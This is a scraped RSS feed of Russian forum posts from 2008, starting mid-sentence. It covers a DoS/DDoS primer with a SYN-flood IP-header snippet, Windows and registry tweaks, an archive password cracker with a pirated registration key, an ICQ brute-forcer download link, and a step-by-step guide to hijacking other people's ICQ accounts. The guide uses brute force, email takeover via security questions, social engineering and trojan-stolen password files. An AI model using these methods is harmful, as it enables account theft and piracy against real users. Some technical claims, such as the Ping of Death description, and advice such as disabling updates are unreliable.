могут пользоваться услугами пострадавшего сервера. Просто и со вкусом :). Однако если сервер атакует одна &quot;точка&quot;, он вполне может закрыться от нее фаерволом. Кроме того, для проведения качественной DoS-атаки необходима довольно высокая пропускная способность канала. Поэтому атака на отказ в обслуживании в большинстве случаев проводится сразу с нескольких машин. Атака, в проведении которой участвует много машин (обычно это затрояненные десктопы, их называют &quot;зомби&quot;), получила название DDoS (Distributed Denial of Service). Для сколь угодно мощного сервера всегда можно подобрать достаточное количество зомбиков (благо дырявых систем и ушастых юзверей по миру много развелось). <br />Есть несколько способов получения &quot;зомби&quot;. Во-первых, это массовое внедрение трояна на компьютеры мирных пользователей. Самый популярный способ управления троянами - IRC, то есть организация ботнета. При посылке определенных команд троян активируется и мирный домашний компьютер (с широкополосным выходом в интернет) становится источником большого количества мусора, съедающего ресурсы атакуемого сервера. <br />Чтобы более детально разобраться в DoS-атаках, рассмотрим их наиболее известные разновидности. Выделяют пять наиболее популярных: </p> <p>TCP SYN Flood; <br />TCP flood; <br />Ping of Death; <br />ICMP flood; <br />UDP flood. TCP SYN Flood и TCP flood </p> <p>Основная цель этого вида атак - превысить ограничение на количество соединений, которые находятся в состоянии установки. В результате, система не может устанавливать новые соединения. После этого каждый дополнительный запрос еще сильнее увеличивает нагрузку. Для того чтобы достичь желаемого результата, при проведении атаки направляется большое количество запросов на инициализацию TСP-соединения с потенциальной жертвой. Такие атаки не нуждаются в обратной связи с атакующим, и поэтому можно не использовать настоящий адрес источника. <br />Ниже приведен пример установки заголовка IP пакета, который можно использовать в атаке типа &quot;SYN Flood&quot;. </p> <p>Листинг <br />packet.ip.version=4; // Версия <br />packet.ip.ihl=5; // Длина заголовка <br />packet.ip.tos=0; // Тип сервиса <br />packet.ip.tot_len=htons(40); // Общая длина <br />packet.ip.id=getpid(); // Идентификатор <br />packet.ip.frag_off=0; // Смещение фрагмента <br />packet.ip.ttl=255; // Время жизни <br />packet.ip.protocol=IPPROTO_TCP; // Протокол <br />packet.ip.check=0; // Контрольная сумма <br />packet.ip.saddr=saddress; // Адрес источника <br />packet.ip.daddr=daddress; // Адрес назначения </p> <p>TCP flood - это вид атаки, при котором потенциальной жертве отправляется множество TCP-пакетов, что приводит к связыванию системных ресурсов. <br />Следующие виды DoS-атак основаны на совершенно другом принципе. При помощи таких атак можно переполнить сеть или отдельно взятую мишень абсолютно бесполезными ping-пакетами. Для реализации следующих видов атаки достаточно нескольких строк кода. Итак, это атаки, основанные на протоколе ICMP: <br />Ping of Death и ICMP flood </p> <p>Большое количество DoS-атак основывается на протоколе ICMP. Некоторые его функции могут быть полезны для создания нападений такого рода. <br />ICMP flood - это далеко не новый вид атаки, который, тем не менее, не теряет популярности. Здесь используется ping. Ping изначально задумывался для проверки качества соединения с удаленным компьютером. Принцип работы следующий: программа отсылает некое сообщение, на которое удаленный компьютер автоматически отвечает. Вроде бы все нормально. Однако при атаке используются большие (64 кБ), сильно фрагментированные ICMP-пакеты. При получении таких пакетов удаленная машина зависает. <br />Ping of Death основывается на ICMP flood, однако усиливает атаку за счет того, что ping-запросы пересылаются по адресу широковещательной рассылки. Используемый в пакетах запроса адрес - это адрес атакуемого сервера. Получившие такие &quot;посылки смерти&quot; системы отвечают на них и забивают жертву. Это очень серьезный вид атаки, который, правда, требует длительной подготовки. Требуется много &quot;зомби&quot;, необходимо собрать достаточное количество информации о жертве и посредниках. <br />UDP flood </p> <p>Это наиболее опасный вид атаки. UDP-сервис одной машины генерирует последовательность символов для каждого получаемого системой пакета. Делается это в целях тестирования. Далее связывается с echo-сервисом другой машины, которая повторяет эти символы. В результате, передается большое количество UDP-пакетов с подделанным IP источника. Основная проблема для защиты состоит в том, что протокол UDP не устанавливает соединения и нет никаких индикаторов состояния, чтобы помочь межсетевой защите выявить нападение. Чтобы с большей долей вероятности избежать такой атаки, нужно удалить все ненужные UDP-сервисы, а остальным сервисам использовать механизм прокси-сервера. <br />Самые мощные DoS/DDoS-атаки </p> <p>Теперь ты знаешь, что собой представляет атака на отказ в обслуживании. Пришло время составить небольшой хит-парад DoS/DDoS-атак. <br />1) Пожалуй, самой нашумевшей атакой из разряда DoS стала атака на корневые DNS-сервера, произошедшая в ноябре 2002 года. Тогда распределенной атаке подверглись все 13 DNS-серверов, семь из которых вышли из строя. Только высокий уровень избыточности в структуре интернета позволил избежать задержек при обращении к ресурсам. <br />2) Атака на сайт SCO, совершенная при помощи вируса MyDoom и всех его подцепивших. 22 августа 2003 года сайт компании SCO перестал отвечать на запросы пользователей. Атака продолжалась несколько дней и прекратилась только 25 августа. Поскольку вирус MyDoom имел очень широкое распространение, то атака получилась мощнейшей. Вторая редакция вируса MyDoom.B, созданная для атаки на сайт Microsoft, не имела такого &quot;успеха&quot; у пользователей. <br />3) Серверы Osirusoft крупнейшего хранилища IP-адресов, замеченных в спаме, были отключены после большого количества распределенных атак на отказ в обслуживании. Данная служба занималась ведением динамического списка IP-адресов, замеченных в спаме. <br />Атаки на отказ в обслуживании, несомненно, большое зло на просторах интернета. И если отдельно взятую пользовательскую машину можно защитить с помощью фаервола, то для серверов стопроцентной защиты нет и в скором времени не предвидится. Так что с DoS/DDoS-атаками сложилась довольно грустная (или веселая? :)) ситуация. Многие хостеры при обнаружении атаки просто выключают сервера. Это о чем-то говорит ;).</p> mybb@mybb.ru (Stre@m) Wed, 08 Oct 2008 10:37:16 +0400 https://xterritory.0pk.me/viewtopic.php?pid=7#p7 https://xterritory.0pk.me/viewtopic.php?pid=6#p6 <p>настройка виндовс.<br />тут можно говорить чесами...<br />я розкажу самое главное...<br />вопервых ненадо создавать на рабочем столе горы ярлыков...<br />вовторых давайте зайдем в &quot;мой компьютер&quot; и на белом поле щелкаем свойства<br />1. вкладка &quot;автоматическое обновление&quot; - отключить!<br />2. вкладка &quot;дополнительно&quot; - в ней пункт &quot;быстродействие&quot; если вы не геймер советую отключить &quot;файл подкачки&quot; если будете ставить &quot;сталкер&quot; советую на диске с виндой сделать файл подкачки 2ГБ<br />и всегда следить что бы на диске с виндой было хоть 3-4ГБ свободного места...<br />там же в &quot;дополнительно&quot; есть и пункт &quot;отчет об ошибках&quot; там можно отключить те таблички которые бесят&#160; &quot;произошла ошибка отправлять\неотправлять отчет&quot;<br />после введения настроек жмем применить и ок</p> <p>далее невыходя из моего компьютера вверху жмем сервис\свойства папки\вид\<br />там находим пункт &quot;скрывать защищенные системные файлы (рекомендуется)&quot; и снимаем птичку!!! (будут видны файлы такие как boot.ini)<br />под ней есть вкладка &quot;скрывать розширения для зарегистрированных типов файлов&quot; тоже снимаем птичку обязательно!!!<br />далее пункт &quot;показывать\скрывать скрытые файлы и папки&quot; ставим показывать...<br />далее:<br />панель управления\администрирование\управление компьютером\службы и приложения\службы<br />откроется окно перечисляющее службы<br />все описаны в подробностях и я думаю каждый поймет... что если у него нет принтера то и служба прин теров ему ненужна... А ЭТО ЖРЕТ ОПЕРАТИВУ!!!<br />и так далее... все службы которые вам ненадо... <br />далее вся настройка производится по усмотрению владельца...</p> mybb@mybb.ru (Stre@m) Wed, 08 Oct 2008 10:24:00 +0400 https://xterritory.0pk.me/viewtopic.php?pid=6#p6 https://xterritory.0pk.me/viewtopic.php?pid=5#p5 <p>Вашему вниманию предлагается широко известная программа брутилка для восстановления паролей к архивам RAR, ZIP и прочим... (ZIP (PKZIP, WinZIP), ARJ/WinARJ, RAR/WinRAR и ACE/WinACE...)</p> <p><strong>Advanced Archive Password Recovery</strong></p> <p>Качать тут - <a href="http://www.password-crackers.ru/category_98/program_100.html" rel="nofollow" target="_blank">http://www.password-crackers.ru/categor &#8230; m_100.html</a><br />рег. номер:<br />&quot;<strong>ARCHPR-TBHW5SSMYGQS-3KQ2E6E9CU4S4BMN</strong>&quot; - без кавычек!!!</p> <p>Есть в этой програмке следующие благодейства)):<br />1. Банальный перебор паролей<br />2. Перебор паролей по маске<br />3. Перебор паролей по словарю<br />4. Plaintext-атака<br />5. Гарантированная расшифровка WinZIP<br />6. Пароль из ключей</p> <p>по каждому из методов можно найти инфу в Гугле...</p> mybb@mybb.ru (Stre@m) Tue, 07 Oct 2008 21:11:23 +0400 https://xterritory.0pk.me/viewtopic.php?pid=5#p5 https://xterritory.0pk.me/viewtopic.php?pid=4#p4 <p>ICQ-брутфорсер, работает с прокси, поддерживает https, socks4, socks5 прокси. Многопоточный, количество потоков можно изменять в процессе работы. Возможно устанавливать максимальное время отзыва на подключение, чтение и запись (опция Timeout), опция указывается в секундах и может быть изменена во время работы программы. Также реализована очистка прокси-листов от &quot;мертвых&quot; прокси (опция Cleanup, 0 соответствует отключению опции), значение берется при старте, указывается в минутах. Также очистку можно производить вручную с помощью соответствующих кнопок: Cleanup All, Cleanup HTTPs, Cleanup Socks4, Cleanup Socks5. Поддержка множества списков для брута.</p> <p>Файлы для работы брута (если файлов не было, программа сама их создаст при старте):</p> <p>&#160; &#160; * source.txt - список (уин;пароль) для брута<br />&#160; &#160; * good.txt – список (уин;пароль), сюда идут верные комбинации уин;пароль<br />&#160; &#160; * https.txt - список ip:port (host:port недопустимо) https прокси<br />&#160; &#160; * socks4.txt - список ip:port (host:port недопустимо) socks4 прокси<br />&#160; &#160; * socks5.txt - список ip:port (host:port недопустимо) socks5 прокси<br />&#160; &#160; * list.txt - список с именами файлов для брута<br />&quot;Speed&quot; показывает скорость (pps - паролей в секунду) в формате &quot;сейчас / средняя&quot;.<br />скачать <a href="http://grabberz.com/downloads/Brutal.rar" rel="nofollow" target="_blank">http://grabberz.com/downloads/Brutal.rar</a></p> mybb@mybb.ru (Stre@m) Tue, 07 Oct 2008 21:09:45 +0400 https://xterritory.0pk.me/viewtopic.php?pid=4#p4 https://xterritory.0pk.me/viewtopic.php?pid=3#p3 <p>Если вы часто устанавливаете программы, а затем их удаляете, то постепенно размер <br />реестра в разделах <strong>HKEY_CURRENT_USER -&gt; Software и HKEY_LOCAL_MACHIN -&gt; SOFTWARE </strong><br />увеличивается, так как каждая установленная программа оставляет запись о своём <br />пребывании в системе в выше упомянутых разделах реестра. При чистке реестра <br />необходимо учитывать какие из программ у вас установленны, а какие вы уже удалили. <br />Если вы видите запись оставленную программой, которую удалили месяц назад или <br />только вчера смело удаляйте её каталог, а если вы видите запись программы, которая <br />установленна на вашем компе, то советую ничего не трогать. Так же перед тем как <br />бороздить просторы реестра и что либо там удалять сделайте резервную копию реестра. <br />Делается это очень просто Пуск -&gt; Выполнить -&gt; regedit заходите в меню Файл -&gt; Экспорт и <br />присваиваете имя reg файлу. <br />Постепенное увеличение размера реестра ведёт к торможению и глюкам в системе. <br />Поэтому его иногда необходимо &quot;зачищать&quot;. <br />И так приступим к глобальной уборке!</p> <p>&quot;Зачистку реестра&quot; можно выполнять двумя способами: </p> <p>1. руками, т.е зайдя в меню Пуск -&gt; Выполнить -&gt; regedit и производить различные <br />извращения с реестром. </p> <p>2. с помощью специальных программ например RegCleaner. Зайдя в программу выберите <br />раздел Программы и начинайте &quot;зачистку&quot;. </p> <p>С помощью этой программы также можно производить отчистку реестра не влезая в него, <br />для этого зоходите в меню Задачи -&gt; Отчистка реестра -&gt; Задействовать все варианты. <br />Хочу так же сказать, что второй способ наиболее простой и безопасный для вашей системы. </p> <p>Советую удалить из реестра за ненадобностью: <br />- Удаляем Доктор Ватсон(Dr.Watson) - обработчик программных ошибок. Он обрабатывает <br />ошибки по мере их возникновения во время выполнения программы. Нам он не нужен тем <br />более, что его каталог занимает драгоценное место в реестре поэтому, заходим в ветку <br />реестра HKEY_LOCAL_MACHIN -&gt;SOFTWARE -&gt;Microsoft -&gt; и удаляем там папку DrWatson. </p> <p>- Удаляем папку Update, если вы не пользуетесь автоматическим обнавлением, в ветки <br />реестра HKEY_LOCAL_MACHIN -&gt; CurrentControlSet -&gt;Control-&gt;. </p> <p>Все изменения в реестре вступают в силу только после перезагрузки компа. <br />В заключении хочется сказать можете удалять то что считаете не нужным для вас, <br />но будте внимательны и осторожны так как это может привести к краху системы или её <br />неработоспособности</p> mybb@mybb.ru (Stre@m) Tue, 07 Oct 2008 18:36:37 +0400 https://xterritory.0pk.me/viewtopic.php?pid=3#p3 https://xterritory.0pk.me/viewtopic.php?pid=2#p2 <p>ася тоже вешь ломаемая)<br />шестизнак мона купить а мона и ломануть)<br />давайте розсмотрим второй вариант!<br />есть несколько способов взлома айсику:<br />1. - брут (подбор пароля методом перебора всех возможных значений)<br />2. - угон через мыло<br />3. - угон через СИ<br />4. - угон через розшифровку утащеного файлика аси<br />5. - взломав сервак айсику<br />давайте попорядку:<br />брут: есть куча прог для подбора паролей к почтам, асям и всякой фигне потипу этой...<br />все они работают по одинаковому принципу ты указываешь список прокси (для некоторых прог если работает через прокси)<br />указываешь список паролей и один номер или наоборот список номеров и пароль ставишь на пуск и перебирай... она поочереди перебирает пароли или юины.<br />мож когда-то и повезет...<br />а так вообще способ длительный напрегающий и подходит невсегда...<br />нормальная прграммулина есть ICQ password recovery v 1.8 поддерживает много способов перебора, ненадо формировать листы &quot;пас;юин&quot; короче удобная...<br />если использовать другие проги то надо паралельно качать и какойто криэйтер для брута...<br />второй вариант - это угон через мыло...<br />сущевствует такая штуковина как &quot;примари&quot; это когда к конкретному номеру аси привязанно конкретное мыло... и способ взлома заключается в взломе не аси а мыла! вы ломаете мыло (ответ на контрольный вопрос, брут) лучше способом &quot;ответа на контрольный вопрос&quot; тобешь вы востанавливаете пароль мыла! если мы знаем мыло заходим туда) мона меседжи пачитать)<br />но это фигня! нам надо ася! идем в ту асю! нам говорит мол &quot;пароль неверный!&quot;!!! жмем &quot;востановить забытый пароль!&quot; востанавливаем и пароль приходит на мыло владельца! КОТОРОЕ МЫ УЖЕ ЛОМАНУЛИ! идем на мыло и там письмо с паролем от аси!<br />третий способ - это её величество СИ!&#160; ружно смотрим тему СИ там описано в подробностях!<br />четвертый способ - это впринципе мало когда прокатывает... так-как пароль сохраняется в файл если человек нажимает &quot;сохранить пароль&quot; типа вход &quot;на автомате&quot; но пробовать мона...<br />мона писать скрипт который идет по мылу и потом отсылает хвайл к вам или просто ломануть комп с помощью трояна и влезть в папку с аськой стащить оттуда файл и уже &quot;дома&quot; его розархивировать...<br />есть так-же куча прог для розашифровки паролей именно из этих файлов...<br />потому-как у всех клиентов разные файлы мы просто качаем всю папку а потом уже смотрим...<br />на счет пятого - это реально но с моей стороны шутка)</p> mybb@mybb.ru (Stre@m) Tue, 07 Oct 2008 18:28:26 +0400 https://xterritory.0pk.me/viewtopic.php?pid=2#p2